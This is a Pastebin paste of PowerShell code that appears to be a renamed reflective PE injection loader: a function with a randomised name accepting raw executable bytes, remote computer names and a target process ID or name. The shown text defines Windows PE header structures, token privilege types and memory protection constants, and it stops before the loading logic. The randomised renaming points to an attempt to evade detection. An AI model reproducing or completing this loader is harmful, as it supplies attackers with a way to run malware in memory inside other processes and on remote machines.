Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function Invoke-COVDQSQKASLYKYN
- {
- [CmdletBinding()]
- Param(
- [Parameter(Position = 0, Mandatory = $true)]
- [ValidateNotNullOrEmpty()]
- [Byte[]]
- $PEBytes,
- [Parameter(Position = 1)]
- [String[]]
- $ComputerName,
- [Parameter(Position = 2)]
- [ValidateSet( 'WString', 'String', 'Void' )]
- [String]
- $FuncReturnType = 'Void',
- [Parameter(Position = 3)]
- [String]
- $ExeArgs,
- [Parameter(Position = 4)]
- [Int32]
- $ProcId,
- [Parameter(Position = 5)]
- [String]
- $ProcName,
- [Switch]
- $ForceASLR,
- [Switch]
- $DoNotZeroMZ
- )
- Set-StrictMode -Version 2
- $RemoteScriptBlock = {
- [CmdletBinding()]
- Param(
- [Parameter(Position = 0, Mandatory = $true)]
- [Byte[]]
- $PEBytes,
- [Parameter(Position = 1, Mandatory = $true)]
- [String]
- $FuncReturnType,
- [Parameter(Position = 2, Mandatory = $true)]
- [Int32]
- $ProcId,
- [Parameter(Position = 3, Mandatory = $true)]
- [String]
- $ProcName,
- [Parameter(Position = 4, Mandatory = $true)]
- [Bool]
- $ForceASLR
- )
- Function Get-Win32Types
- {
- $Win32Types = New-Object System.Object
- $Domain = [AppDomain]::CurrentDomain
- $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')
- $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
- $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)
- $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
- $TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])
- $TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null
- $TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null
- $TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null
- $TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null
- $MachineType = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType
- $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])
- $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null
- $MagicType = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType
- $TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null
- $SubSystemType = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType
- $TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])
- $TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null
- $TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null
- $TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null
- $TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null
- $TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null
- $DllCharacteristicsType = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)
- ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null
- ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null
- $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)
- $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null
- $IMAGE_FILE_HEADER = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)
- ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
- ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
- ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
- ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
- ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
- ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
- ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
- ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
- ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null
- ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
- ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
- ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
- ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
- ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
- ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
- ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
- ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
- ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
- ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
- ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
- ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
- ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
- ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
- ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null
- ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null
- ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null
- ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null
- ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null
- ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null
- ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
- ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
- ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
- ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
- ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
- ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
- ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
- ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
- ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
- ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
- ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
- ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
- ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
- ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
- ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null
- ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null
- $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224)
- ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
- ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
- ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
- ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
- ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
- ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
- ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
- ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
- ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null
- ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null
- ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
- ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
- ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
- ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
- ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
- ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
- ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
- ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
- ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
- ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
- ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
- ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
- ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
- ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
- ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null
- ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null
- ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null
- ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null
- ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null
- ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null
- ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null
- ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null
- ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
- ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
- ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
- ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
- ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
- ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
- ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
- ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
- ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
- ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
- ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
- ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
- ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
- ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
- $IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264)
- $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
- $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null
- $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248)
- $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
- $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null
- $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64)
- $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null
- $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal')
- $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
- $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))
- $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4))
- $e_resField.SetCustomAttribute($AttribBuilder)
- $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null
- $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal')
- $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
- $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10))
- $e_res2Field.SetCustomAttribute($AttribBuilder)
- $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null
- $IMAGE_DOS_HEADER = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40)
- $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal')
- $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
- $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8))
- $nameField.SetCustomAttribute($AttribBuilder)
- $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
- $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8)
- $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null
- $IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20)
- $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null
- $IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40)
- $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null
- $IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8)
- $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null
- $LUID = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12)
- $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null
- $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null
- $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16)
- $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null
- $TOKEN_PRIVILEGES = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES
- return $Win32Types
- }
- Function Get-Win32Constants
- {
- $Win32Constants = New-Object System.Object
- $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000
- $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000
- $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01
- $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02
- $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04
- $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08
- $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10
- $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20
- $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40
- $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80
- $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200
